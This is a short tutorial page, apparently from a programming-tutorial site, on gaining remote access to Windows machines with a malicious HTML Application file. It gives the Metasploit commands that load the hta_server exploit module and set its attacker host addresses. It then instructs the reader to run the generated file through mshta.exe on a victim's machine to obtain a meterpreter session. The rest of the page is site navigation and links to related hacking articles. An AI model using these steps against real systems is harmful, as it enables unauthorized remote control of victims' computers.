- Trending Categories
- Data Structure
- Operating System
- C Programming
- Selected Reading
- UPSC IAS Exams Notes
- Developer's Best Practices
- Questions and Answers
- Effective Resume Writing
- HR Interview Questions
- Computer Glossary
- Who is Who
Hacking with HTA file (MSHTA.exe)
Metasploit contain the “HTA Web Server” module which generates malicious hta file. This module hosts an HTML Application (HTA) that when opened will run a payload via Powershell.
Malicious HTA file
Open metasploit in Kali linux and hit the following commands to generate a malicious HTA file as;
- use exploit/windows/misc/hta_server
- set srvhost 192.168.1.109
- set lhost 192.168.1.109
Now run the malicious code on the target machine through mshta.exe on the victim’s machine to obtain meterpreter sessions.
- Converting Tkinter program to exe file
- Hacking with Santet
- Hide the console of an .exe file created with PyInstaller in Tkinter
- Stegosploit: Hacking with Images
- Rundll32.exe Attack
- What is Hacking?
- What is Webcam Hacking?
- What is Hacking and how is it performed? How to prevent hacking?
- What is Gray Hat Hacking?
- What is Hacktivism? ( Hacktivism vs. Hacking)
- How Ethical Hacking is Helping IT Security?
- What are some of the common types of Hacking?
- How to compile a Python 3 app to an .exe using Tkinter?
- Which is the best institute for ethical hacking in India?